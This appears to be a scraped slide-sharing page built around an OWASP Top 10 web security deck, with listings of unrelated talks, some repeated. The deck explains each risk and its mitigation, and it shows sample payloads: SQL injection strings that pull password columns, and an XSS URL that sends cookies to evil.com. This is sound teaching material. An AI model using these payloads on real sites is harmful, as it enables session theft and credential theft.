The document discusses the top 10 security risks as defined by OWASP: injection, XSS, broken authentication, insecure direct object references, CSRF, security misconfiguration, insecure cryptographic storage, failure to restrict URL access, insufficient transport layer protection, and unvalidated redirects and forwards. For each risk, the document explains what it is, why it is a risk, and how it can be mitigated through secure coding practices. The presenter is identified as an Austin OWASP board member who leads security training and runs a security consulting business.
A walkthrough of web application defense strategies, based around the Open Web Application Security Project's top 10 list. Presented to the Classic City Developers Meetup in August 2017.
A walkthrough of web application defense strategies, based around the Open Web Application Security Project's top 10 list. Presented to the Classic City Developers Meetup in August 2017.
OWASP Top 10 - 2017 Top 10 web application security risksKun-Da Wu
The OWASP team recently released the 2017 revised version of the ten most critical web application security risks. This presentation brief the OWASP Top 10 - 2017 for you to learn more about these important security issues.
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksAndre Van Klaveren
A presentation of the OWASP Top 10 2017 release candidate, expected to be finalized in summer 2017. Presented at the St. Louis CYBER meetup on Wednesday, June 7, 2017.
Basic overview, testing, mitigation plan for popular web application vulnerabilities such as: XSS, CSRF, SQLi etc.
Updated "Web Security - Introduction" presentation.
AuthN & AuthZ testing: it’s not only about the login formDiana Pinchuk
Presentation in Google Slides http://bit.ly/AuthZ-AuthN-Diana
Testers are often asked at interviews to test a login form. And this is where their acquaintance with authentication testing ends.
We'll talk about authorization and authentication (AuthZ & AuthN) testing: what is the difference between them and how to stop confusing them; what are the specifics of the work of the Oauth 2.0 protocol; what are the best practices of AuthZ & AuthN security testing; what is Identity and Access Management system and where to practice testing of that famous login form.
The talk will be useful for functional testers and those who are interested in the technological aspects of AuthZ & AuthN.
OWASP Top 10 - 2017 Top 10 web application security risksKun-Da Wu
The OWASP team recently released the 2017 revised version of the ten most critical web application security risks. This presentation brief the OWASP Top 10 - 2017 for you to learn more about these important security issues.
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksAndre Van Klaveren
A presentation of the OWASP Top 10 2017 release candidate, expected to be finalized in summer 2017. Presented at the St. Louis CYBER meetup on Wednesday, June 7, 2017.
Basic overview, testing, mitigation plan for popular web application vulnerabilities such as: XSS, CSRF, SQLi etc.
Updated "Web Security - Introduction" presentation.
AuthN & AuthZ testing: it’s not only about the login formDiana Pinchuk
Presentation in Google Slides http://bit.ly/AuthZ-AuthN-Diana
Testers are often asked at interviews to test a login form. And this is where their acquaintance with authentication testing ends.
We'll talk about authorization and authentication (AuthZ & AuthN) testing: what is the difference between them and how to stop confusing them; what are the specifics of the work of the Oauth 2.0 protocol; what are the best practices of AuthZ & AuthN security testing; what is Identity and Access Management system and where to practice testing of that famous login form.
The talk will be useful for functional testers and those who are interested in the technological aspects of AuthZ & AuthN.
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...IBM Security
View the on-demand recording: http://securityintelligence.com/events/avoiding-application-attacks/
Your organization is running fast to build your business. You are developing new applications faster than ever and utilizing new cloud-based development platforms. Your customers and employees expect applications that are powerful, highly usable, and secure. Yet this need for speed coupled with new development techniques is increasing the likelihood of security issues.
How can you meet the needs of speed to market with security? Hear Paul Ionescu, IBM Security, Ethical Hacking Team Lead discuss:
- How application attacks work
- Open Web Application Security Project (OWASP) goals
- How to build defenses into your applications
- The 10 most common web application attacks, including demos of the infamous Shellshock and Heartbleed vulnerabilities
- How to test for and prevent these types of threats
Writing secure applications is critical. Whether you're writing code at the SMT level, MivaScript level, server level or anywhere else, it's important to keep security in mind. Come in and learn how to mitigate exploits, initiate exploits, and learn about incidence handling.
OWASP Top 10 List Overview for Web DevelopersBenjamin Floyd
The OWASP Top 10 List was recently updated for 2013, and many developers still do not know what it is or why they should care. It is a list of the top web security threats developers need to address to produce secure websites. Most developers aren't security experts, so the OWASP Top 10 Project has created resources designed for developers to quickly test their applications. Come hear about the list, why and how you can use it to make your job easier, and learn about resources you can use to quickly determine if your applications are addressing security threats properly.
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...Quek Lilian
A live hacking session demonstrating the different tools and techniques used by hackers and an in-depth understanding of the problems of insecure application and the solutions to solve the vulnerability.
Here you can find the slides that accompany my “SPA Secure Coding Guide”, this presentation go through a set of security best practices specially targeted towards developing Angular applications with ASP.Net Web Api backends.
It comes with a WebApi example project available on GitHub that provides several code examples of how to defend yourself. The example app is based on the famous "Tour of Heroes" Angular app used throughout the Angular documentation.
It first introduce general threat modelling before explaining the most current type of attacks Asp.Net Web API are vulnerable to .
It is designed to serve as a secure coding reference guide, to help development teams quickly understand Asp.Net Core secure coding practices.
A presentation of OWASP's top 10 most common web application security flaws. The content in the slides is sourced from various sources listed in the references section.
Security Ninjas: An Open Source Application Security Training ProgramOpenDNS
NOTES
--
Slide 8
Some of the categories we will discuss are very broad like this one.
Untrusted command – get / post / rest style params
Clicks
Surprise inputs
Slide 13
Very broad too
Little or no auth
Auth with some bypass possibilities
Some problem with how session is generated, managed, expired
Insufficient sessionID protection
Slide 18
When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user’s browser.
Slide 27
Security hardening throughout Application Stack
Unnecessary features enabled or installed?
ports, services, pages, accounts, privileges
Security settings in your development frameworks (e.g., Struts, Spring, ASP.NET) and libraries not set to secure values?
Default accounts/ passwords still enabled and unchanged?
Error handling reveal stack traces or other overly informative error messages to users?
Software out of date?
OS, Web Server, DBMS, applications, code libraries
Slide 41
sign up for updates or do regular audits to see versions
there might be technical dependencies
easily exploited by attackers using metaspoilt, info gathering using headers & responses, etc.
Slide 47
We can look at the architecture, give you tips around what you could use, what would be good. This would avoid making any major changes when the product is ready which would save everyone’s time in the long run.
Have sprints with dedicated security features and use those as a selling point for our security conscious customers
Slide 48
Carefully look at the license to make sure you can use it in your type of product. Ask Fallon if you are not sure
Research how much support it gets, how popular it is
Look to find out any vulnerabilities in it before you start using it
Maintain it; Sign up for CVE updates
Ask us if you need to get something reviewed
Slide 50
Not only better and more features
Security vulnerabilities get patched in new versions
New versions get most attention by the companies and old ones stop getting support after some time fully
Most Security Support by the community
Turn on auto updates for Chrome; always look at updates on AppStore
Slide 51
Use different passwords for different sites
Password managers let you set complexity, generate random passwords, etc.
Slide 52
Only grant access to whats needed to get the job done
employee leaves; mistakes; vulnerabilities in other s/w which leverages this;
Don’t install redundant software, plugins, etc.
This opens up so much risk
People forget to uninstall them; s/w doesn't get much attention from community; open ports are left; boom exploited by attackers;
Slide 55
To prevent unintended execution actions
e.g., fail open auth errors
Leak minimal info about infrastructure as this info is leveraged by attackers to carry out further attacks
OWASP Portland - OWASP Top 10 For JavaScript DevelopersLewis Ardern
With the release of the OWASP TOP 10 2017 we saw new issues rise as contenders of most common issues in the web landscape. Much of the OWASP documentation displays issues, and remediation advice/code relating to Java, C++, and C#; however not much relating to JavaScript. JavaScript has drastically changed over the last few years with the release of Angular, React, and Vue, alongside the popular use of NodeJS and its libraries/frameworks. This talk will introduce you to the OWASP Top 10 explaining JavaScript client and server-side vulnerabilities.
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
Generating a custom Ruby SDK for your web service or Rails API using Smithyg2nightmarescribd
Have you ever wanted a Ruby client API to communicate with your web service? Smithy is a protocol-agnostic language for defining services and SDKs. Smithy Ruby is an implementation of Smithy that generates a Ruby SDK using a Smithy model. In this talk, we will explore Smithy and Smithy Ruby to learn how to generate custom feature-rich SDKs that can communicate with any web service, such as a Rails JSON API.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Leading Change strategies and insights for effective change management pdf 1.pdf
OWASPTop 10
1. What are they?
Why do attackers use them?
How can we protect against them?
By: Ben Broussard
2. Who is Ben Broussard?
Austin OWASP board member
Fearless leader of OWASP Study Group (free training!)
President of Kedalion Security, LLC.
Background:
BS in Mathematics from UT Austin (crypto)
Mainframe and web app programmer for UT
Web app security interest led to OWASP involvement
OWASP involvement led to Infosec career (Kedalion)
Gymnastics, AI, Braainnsss, Simulations, Kung Fu,
Mathlete, Bboy, Foodie, and more!
3. TOP 10
1. Injection 6. Security
2. Cross-Site Scripting
Misconfiguration
(XSS) 7. Insecure Cryptographic
3. Broken Authentication
Storage
and Session 8. Failure to Restrict URL
Management Access
4. Insecure Direct Object 9. Insufficient Transport
Reference Layer Protection
5. Cross-Site Request 10. Unvalidated Redirects
Forgery (CSRF) and Forwards
4. 1. Injection
SQL:
query = “SELECT * FROM table WHERE column =
„“ + input + “‟;”
Attacker’s input: x‟ or „x‟=„x
Resulting query: SELECT * FROM table WHERE
column = „x‟ or „x‟=„x‟;
Other types of injection include XML, Command, and
anywhere untrusted input is placed in an eval-like
statement.
5. 1. Injection (cont.)
Why: These attacks inject code into the running
program. What could the program do? That is what
injected code can do.
How: Depends on the platform. Best solution is
Parameterized Queries. Don’t treat data like code.
Don’t put data in the equivalent of an eval statement.
6. 2. Cross-Site Scripting
There are fewer flavors of jelly beans.
Reflected vs Persistent or Stored
Attack could be a link to be clicked on, or part of an
open redirect, or any clever scheme the attacker
dreams up:
Attack URL:
www.example.com/search?query=<script>document
.location = “evil.com?cookie=“ +
document.cookie;</script>
7. 2. Cross-Site Scripting (cont.)
Why: An attacker can steal cookies and masquerade as
the victim, make the victim site look like anything,
and take many actions that the victim can such as
submitting forms.
How: Entity encoding. This is how a technical blog
shows HTML code without the browser executing that
code. ‘<‘ becomes ‘<’ and the browser shows it as ‘<‘.
8. 3. Broken Authentication and
Session Management
This issue is common because it is difficult:
Highly technical involving cookie intricacies, the
request-response model, the same-origin policy,
cryptography and more
Attacks include session fixation, cookie generation or
brute-forcing, direct browsing, forced logout/lockout,
open redirects, cookie capture, CSRF, inadequate
logout, password reset/account creation, user
enumeration, and much more
9. 3. Broken Authentication and
Session Management (cont.)
Why: These attacks allow attackers to take actions as
valid users and attack users directly.
How: This is hard. If possible use a standard library. If
not, make sure you cover cryptographic cookie
strength, a framework that covers all pages that
require authentication, noncing, SSL, refreshing the
cookie upon login, and pay special attention to
account creation, password reset, logout/lockout, and
re-login.
10. 4. Insecure Direct Object Reference
www.example.com/cart.php?cartid=413
Change cartid=413 to cartid=412
Due to a lack of Authorization checking
Systemic of trusting the client
Surprisingly common and the easiest vulnerability to
exploit
11. 4. Insecure Direct Object Reference
(cont.)
Why: An attacker can access other users’ sensitive data
and often take actions as other users.
How: Implement proper Authentication and validate
user input. This issue implies a lack of developer
security training, as it is the most obvious
vulnerability, and shows that the developer trusts the
client to enforce user actions. Is there a hidden price
field, too?
12. 5. Cross-Site Request Forgery
This attack is complex to understand but simple to
execute and extremely common.
Pieces:
Cookies are sent with every request to the domain they
are set for. This is how login is maintained.
HTML pages cause your browser to make many
requests: images, scripts, redirects, iframes, etc.
Your browser can be forced to send a request that takes
an action to a domain you are logged into.
13. 5. Cross-Site Request Forgery
(cont.)
Why: Attackers can force logged in users to take
actions: password update, funds transfer, grant
privileges, update direct deposit info, anything
How: Make sure no XSS exists on domain or any
subdomains. Implement a nonce system (tied to the
user) on forms which take actions. This way, only
requests that contain the nonce are valid. Stops an
attacker from crafting a valid request to force your
browser to make.
14. 6. Security Misconfiguration
Examples include:
Default accounts
Lack of SSL
Enabled insecure features (php include, SSI)
Out of date patch levels (IIS 6 or below, old Tomcat)
Web server running as root with execution rights to
upload directories
This is a very broad category
15. 6. Security Misconfiguration (cont.)
Why: Often these lead to shell upload and complete
compromise, but the vulnerability depends on the
misconfigured functionality.
How: Procedures are the answer here. Have a review
process for all implemented technologies and a patch
process with quick turnover. This category is too broad
for a good answer.
16. 7. Insecure Cryptographic Storage
The number one issue here is lack of proper password
storage. Plaintext passwords are the opposite of
defense in depth.
SQL injection attack to get passwords:
x‟ UNION SELECT column_name, table_name,
null, …, null FROM information_schema.columns
WHERE column_name LIKE „%pass%‟;--
x‟ UNION SELECT passwd, null, …, null FROM
user_details1;--
17. 7. Insecure Cryptographic Storage
(cont.)
Why: Sensitive data is an attacker’s goal. If they
succeed at their goal of obtaining access, that doesn’t
mean that have the data. If it isn’t properly encrypted,
then it does.
How: Encrypt sensitive data. Enforce proper key
management.
18. 8. Failure to Restrict URL Access
This is really failure to validate Authorization on every
page.
Most common for static pages which should require
Authorization such as access to a blog, sensitive
document, or downloadable materials.
Less common for dynamic pages, since user details
need to be taken into account to create the dynamic
page.
19. 8. Failure to Restrict URL Access
(cont.)
Why: Bypassing authorization allows an attacker to
take actions or view data they wouldn’t otherwise be
able to take. The value of these actions or data is the
value of this attack.
How: Implement Authentication validation in a
framework sort of way. Page-by-page makes it easy to
leave pages out. Opt-out Authorization checking as
opposed to opt-in.
20. 9. Insufficient Transport Layer
Protection
Lack of SSL
For request containing credentials
For request to get login page
For any page after login (session cookies, firesheep)
For any page containing authentication details (pre-
login session cookie or cart id)
Any time sensitive data is being submitted (sometimes
login isn’t required to submit a form, but SSL may be)
Other protocols too: SSH, SFTP, VPN, etc.
21. 9. Insufficient Transport Layer
Protection (cont.)
Why: Grabbing cookies allows an attacker to
masquerade as a valid user. Grabbing data is pretty
much the point.
How: Implement SSL everywhere it is needed,
including pre-logon areas if there is a pre-logon
session. Disable port 80 if possible. Make sure that
cookies have the “Secure” flag on them.
22. 10. Unvalidated Redirects and
Forwards
Redirects are a necessity:
Login after session timeout
Many forms validate input and redirect to next step
Retired pages and sites redirect to the new location
If user input is used as the redirection location and
can be any location on the Internet, then an attacker
can:
Craft a better phishing attack (to deliver malware or
gather credentials)
Bypass referer checking for CSRF attacks
23. 10. Unvalidated Redirects and
Forwards (cont.)
Why: Plausability: their fishing attacks contain links
to trusted sites. Also, the site may accept requests that
it forces users to make more readily.
How: Validate redirection locations. There is rarely
cause for a fully dynamic redirect. Use POST requests
for requests that take actions or change data (like W3C
says to).
24. Questions?
1. Injection 6. Security
2. Cross-Site Scripting
Misconfiguration
(XSS) 7. Insecure Cryptographic
3. Broken Authentication
Storage
and Session 8. Failure to Restrict URL
Management Access
4. Insecure Direct Object 9. Insufficient Transport
Reference Layer Protection
5. Cross-Site Request 10. Unvalidated Redirects
Forgery (CSRF) and Forwards